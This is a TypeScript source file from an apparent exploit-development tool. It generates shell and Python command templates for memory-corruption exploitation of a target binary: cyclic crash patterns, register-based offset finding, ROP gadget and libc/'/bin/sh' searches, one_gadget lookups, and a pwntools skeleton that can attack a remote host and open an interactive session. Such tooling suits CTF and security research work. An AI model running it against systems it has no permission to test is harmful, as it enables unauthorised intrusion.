/** Pwn primitive basic scaffolds: runtime bridge, mitigations, crash, offset, gadgets. */
import type { SpecialistPackContext } from "./types.ts";

export function applyWantsPwnPrimitiveBasic(ctx: SpecialistPackContext): void {
	ctx.specialists.push("pwn primitive");
	ctx.add(
		"pwn-runtime-repi-bridge",
		ctx.target
			? `printf '%s\\n' "re_native_runtime run ${ctx.targetArg}" "REPI_NATIVE_RUN=1 re_native_runtime run ${ctx.targetArg}" "re_exploit_lab run ${ctx.targetArg} 8" "re_proof_loop run ${ctx.targetArg} 4 2" "re_domain_proof_exit show" "re_complete audit"`
			: "printf '[pwn-runtime-bridge] target_missing\\n'",
		"bridge to native runtime + exploit lab + proof loop for crash/control verification",
	);
	ctx.add(
		"pwn-primitive-mitigation-fingerprint",
		`file ${ctx.targetArg}; checksec --file=${ctx.targetArg} 2>/dev/null || true; ldd ${ctx.targetArg} 2>/dev/null || true; patchelf --print-interpreter ${ctx.targetArg} 2>/dev/null || true`,
		"pwn primitive mitigation, loader, and libc fingerprint",
	);
	ctx.add(
		"pwn-primitive-cyclic-crash",
		`python3 - <<'PY'\nimport pathlib, string\nalphabet = string.ascii_lowercase.encode() + string.ascii_uppercase.encode() + string.digits.encode()\nout = bytearray()\nfor a in alphabet:\n  for b in alphabet:\n    for c in alphabet:\n      out += bytes([a,b,c])\npathlib.Path('/tmp/repi-cyclic.bin').write_bytes(bytes(out[:4096]))\nprint('/tmp/repi-cyclic.bin', len(out[:4096]))\nPY\nif command -v gdb >/dev/null 2>&1; then (gdb -q ${ctx.targetArg} -ex 'set pagination off' -ex 'run < /tmp/repi-cyclic.bin' -ex 'info registers' -ex 'bt' -ex 'x/24gx $rsp' -ex 'quit' || true) 2>&1 | tee /tmp/repi-pwn-crash.log; else (${ctx.targetArg} < /tmp/repi-cyclic.bin || true) > /tmp/repi-pwn-crash.log 2>&1; sed -n '1,160p' /tmp/repi-pwn-crash.log; fi`,
		"cyclic crash/control proof with registers/backtrace fallback",
	);
	ctx.add(
		"pwn-primitive-offset-analyzer",
		`cat > /tmp/repi-pwn-offset-analyzer.py <<'PY'\n#!/usr/bin/env python3\nimport os, pathlib, re, string, sys\n\ndef cyclic(length=8192):\n    alphabet = (string.ascii_lowercase + string.ascii_uppercase + string.digits).encode()\n    out = bytearray()\n    for a in alphabet:\n        for b in alphabet:\n            for c in alphabet:\n                out += bytes([a, b, c])\n                if len(out) >= length:\n                    return bytes(out[:length])\n    return bytes(out[:length])\n\ndef clean_hex(value):\n    text = value.lower().replace('0x', '')\n    text = re.sub(r'[^0-9a-f]', '', text)\n    if len(text) % 2:\n        text = '0' + text\n    return text\n\ndef byte_candidates(value):\n    text = clean_hex(value)\n    if not text:\n        return []\n    raw = bytes.fromhex(text)\n    chunks = [raw, raw[::-1]]\n    for size in (8, 4, 3, 2):\n        if len(raw) >= size:\n            chunks.extend([raw[-size:], raw[-size:][::-1], raw[:size], raw[:size][::-1]])\n    seen, out = set(), []\n    for chunk in chunks:\n        if not chunk or chunk in seen or set(chunk) == {0}:\n            continue\n        seen.add(chunk)\n        out.append(chunk)\n    return out\n\npat = pathlib.Path('/tmp/repi-cyclic.bin')\ndata = pat.read_bytes() if pat.exists() else cyclic()\nif not pat.exists():\n    pat.write_bytes(data)\nvalues = []\nenv_value = os.getenv('REPI_CRASH_VALUE', '').strip()\nif env_value:\n    values.append(('env', env_value))\nfor arg in sys.argv[1:]:\n    values.append(('argv', arg))\nlog = pathlib.Path('/tmp/repi-pwn-crash.log')\nif log.exists():\n    text = log.read_text(errors='replace')\n    for reg, value in re.findall(r'\\b(RIP|EIP|PC|rip|eip|pc)\\s*[:=]?\\s*(0x[0-9a-fA-F]+)', text):\n        values.append((reg.upper(), value))\nseen_values, unique = set(), []\nfor source, value in values:\n    key = (source, value.lower())\n    if key not in seen_values:\n        seen_values.add(key)\n        unique.append((source, value))\nif not unique:\n    print('[pwn-offset] crash_value=<unset> offset=-1 note=set REPI_CRASH_VALUE or rerun pwn-primitive-cyclic-crash')\n    sys.exit(0)\nmatched = False\nfor source, value in unique:\n    local_match = False\n    for candidate in byte_candidates(value):\n        off = data.find(candidate)\n        print(f'[pwn-offset] crash_value={value} source={source} candidate={candidate.hex()} offset={off}')\n        if off >= 0:\n            matched = True\n            local_match = True\n            break\n    if not local_match:\n        print(f'[pwn-offset] crash_value={value} source={source} offset=-1')\nif not matched:\n    print(f'[pwn-offset] no_match=true pattern_len={len(data)}')\nPY\nchmod +x /tmp/repi-pwn-offset-analyzer.py\npython3 /tmp/repi-pwn-offset-analyzer.py`,
		"automatic cyclic offset analyzer from RIP/EIP/PC or REPI_CRASH_VALUE",
	);
	ctx.add(
		"pwn-primitive-gadget-sweep",
		`(ROPgadget --binary ${ctx.targetArg} --only 'pop|ret|syscall' 2>/dev/null || ropper --file ${ctx.targetArg} --search 'pop rdi; ret' 2>/dev/null || objdump -d ${ctx.targetArg} | grep -Ei 'pop|ret|syscall' | head -120)`,
		"ROP/JOP gadget and syscall surface",
	);
	ctx.add(
		"pwn-primitive-rop-libc-scaffold",
		`cat > /tmp/repi-pwn-rop-libc.py <<'PY'\n#!/usr/bin/env python3\nimport shutil, subprocess, sys\nBIN = sys.argv[1] if len(sys.argv) > 1 else ${ctx.targetPython}\n\ndef run(argv):\n    try:\n        out = subprocess.run(argv, text=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, timeout=8)\n        return out.stdout\n    except Exception as exc:\n        return f'{type(exc).__name__}: {exc}\\n'\n\nprint(f'[pwn-rop-chain] ctx.target={BIN}')\ntry:\n    from pwn import ELF, ROP, ctx.context\n    ctx.context.log_level = 'error'\n    elf = ELF(BIN, checksec=False)\n    print(f'[pwn-rop-chain] arch={elf.arch} bits={elf.bits} pie={elf.pie} nx={getattr(elf, "nx", "?")} canary={getattr(elf, "canary", "?")} entry={hex(elf.entry)}')\n    for name in ['puts', 'printf', 'read', 'write', 'system', '__libc_start_main']:\n        if name in elf.plt:\n            print(f'[pwn-rop-chain] {name}@plt={hex(elf.plt[name])}')\n        if name in elf.got:\n            print(f'[pwn-rop-chain] {name}@got={hex(elf.got[name])}')\n    try:\n        rop = ROP(elf)\n        for gadget in (['ret'], ['pop rdi', 'ret'], ['pop rsi', 'ret'], ['pop rdx', 'ret'], ['syscall']):\n            found = rop.find_gadget(gadget)\n            if found:\n                label = '_'.join(gadget).replace(' ', '_')\n                print(f'[pwn-rop-chain] {label}={hex(found.address)}')\n    except Exception as exc:\n        print(f'[pwn-rop-chain] rop_error={type(exc).__name__}:{exc}')\n    try:\n        binsh = next(elf.search(b'/bin/sh'))\n        print(f'[pwn-rop-chain] bin_sh={hex(binsh)}')\n    except StopIteration:\n        pass\nexcept Exception as exc:\n    print(f'[pwn-rop-chain] pwntools_unavailable={type(exc).__name__}:{exc}')\n\nprint('[pwn-rop-chain] dynamic_symbols')\nprint(run(['objdump', '-T', BIN])[:4000] if shutil.which('objdump') else 'objdump missing')\nPY\nchmod +x /tmp/repi-pwn-rop-libc.py\nfile ${ctx.targetArg}; checksec --file=${ctx.targetArg} 2>/dev/null || true; ldd ${ctx.targetArg} 2>/dev/null || true\nLIBC=$(ldd ${ctx.targetArg} 2>/dev/null | awk '/libc\\.so/{print $(NF-1); exit}')\nif [ -n "$LIBC" ] && [ -e "$LIBC" ]; then echo "[pwn-libc-fingerprint] libc=$LIBC"; file "$LIBC"; sha256sum "$LIBC"; strings -a "$LIBC" | grep -m1 -E 'GNU C Library|GLIBC' || true; fi\npython3 /tmp/repi-pwn-rop-libc.py ${ctx.targetArg}\nobjdump -R ${ctx.targetArg} 2>/dev/null | grep -Ei 'puts|printf|read|write|system|__libc_start_main' | sed 's/^/[pwn-rop-chain] got /' | head -80 || true\nobjdump -d ${ctx.targetArg} 2>/dev/null | grep -Ei '<(puts|printf|read|write|system)@plt>' | sed 's/^/[pwn-rop-chain] plt /' | head -80 || true\n(ROPgadget --binary ${ctx.targetArg} --only 'pop|ret|syscall' 2>/dev/null || ropper --file ${ctx.targetArg} --search 'pop rdi; ret' 2>/dev/null || objdump -d ${ctx.targetArg} | grep -Ei 'pop|ret|syscall' | head -180)`,
		"ROP/libc scaffold with PLT/GOT, pop gadgets, libc fingerprint, and pwntools/objdump fallbacks",
	);
	ctx.add(
		"pwn-primitive-one-gadget-seccomp",
		`libc=$(ldd ${ctx.targetArg} 2>/dev/null | awk '/libc\\.so/ {print $3; exit}'); echo "[pwn-libc] $libc"; if [ -n "$libc" ]; then (command -v one_gadget >/dev/null && one_gadget "$libc" | sed 's/^/[one_gadget] /' | head -80) || true; (command -v seccomp-tools >/dev/null && seccomp-tools dump ${ctx.targetArg} 2>/dev/null | sed 's/^/[seccomp] /' | head -120) || (command -v checksec >/dev/null && checksec --file=${ctx.targetArg} 2>/dev/null | sed 's/^/[pwn-mitigation] /'); else echo '[pwn-libc] missing'; fi`,
		"one_gadget candidates and seccomp/sandbox syscall filter proof from resolved libc/binary",
	);
	ctx.add(
		"pwn-primitive-local-verifier",
		`cat > /tmp/repi-pwn-local-verifier.py <<'PY'\n#!/usr/bin/env python3\nimport os, re, shlex, subprocess, sys\nBIN = sys.argv[1] if len(sys.argv) > 1 else ${ctx.targetPython}\nraw_offset = os.getenv('REPI_OFFSET', '0').strip() or '0'\ntry:\n    offset = int(raw_offset, 0)\nexcept ValueError:\n    offset = 0\npayload_hex = re.sub(r'\\s+', '', os.getenv('REPI_PAYLOAD_HEX', '').strip())\nret_hex = re.sub(r'\\s+', '', os.getenv('REPI_RET_HEX', '4242424242424242').strip())\nif payload_hex:\n    payload = bytes.fromhex(payload_hex)\nelif offset > 0:\n    payload = b'A' * offset + bytes.fromhex(ret_hex)\nelse:\n    payload = b'A' * 256\nif not payload.endswith(b'\\n'):\n    payload += b'\\n'\nargv = [BIN] + shlex.split(os.getenv('REPI_ARGV', ''))\ntimeout = float(os.getenv('REPI_TIMEOUT', '3'))\nprint(f'[pwn-local-verifier] ctx.target={BIN} offset={offset} payload_len={len(payload)} argv={argv[1:]}')\ntry:\n    proc = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n    out, err = proc.communicate(payload, timeout=timeout)\n    print(f'[pwn-local-verifier] exit={proc.returncode} stdout_len={len(out)} stderr_len={len(err)} timeout=false')\n    if out:\n        print('[pwn-local-verifier:stdout]', out[:1200].decode('utf-8', 'replace'))\n    if err:\n        print('[pwn-local-verifier:stderr]', err[:1200].decode('utf-8', 'replace'))\nexcept subprocess.TimeoutExpired:\n    proc.kill()\n    out, err = proc.communicate()\n    print(f'[pwn-local-verifier] exit=timeout stdout_len={len(out)} stderr_len={len(err)} timeout=true interactive_candidate=true')\nexcept Exception as exc:\n    print(f'[pwn-local-verifier] error={type(exc).__name__}:{exc}')\nPY\nchmod +x /tmp/repi-pwn-local-verifier.py\npython3 /tmp/repi-pwn-local-verifier.py ${ctx.targetArg}`,
		"local exploit payload smoke verifier using REPI_OFFSET or REPI_PAYLOAD_HEX",
	);
	ctx.add(
		"pwn-primitive-pwntools-skeleton",
		`cat > /tmp/repi-exploit.py <<'PY'\nfrom pwn import *\nBIN = ${ctx.targetPython}\ncontext.binary = exe = ELF(BIN, checksec=False)\ncontext.log_level = 'debug'\nHOST, PORT = args.HOST or '127.0.0.1', int(args.PORT or 31337)\ndef start():\n    return remote(HOST, PORT) if args.REMOTE else process([BIN])\nio = start()\n# TODO: paste leak/offset from pwn-primitive-cyclic-crash and gadget sweep\npayload = b'A' *  cyclic_find(0x6161616c, n=4)\nio.sendline(payload)\nio.interactive()\nPY\nsed -n '1,220p' /tmp/repi-exploit.py`,
		"pwntools exploit scaffold bound to current binary",
	);
}
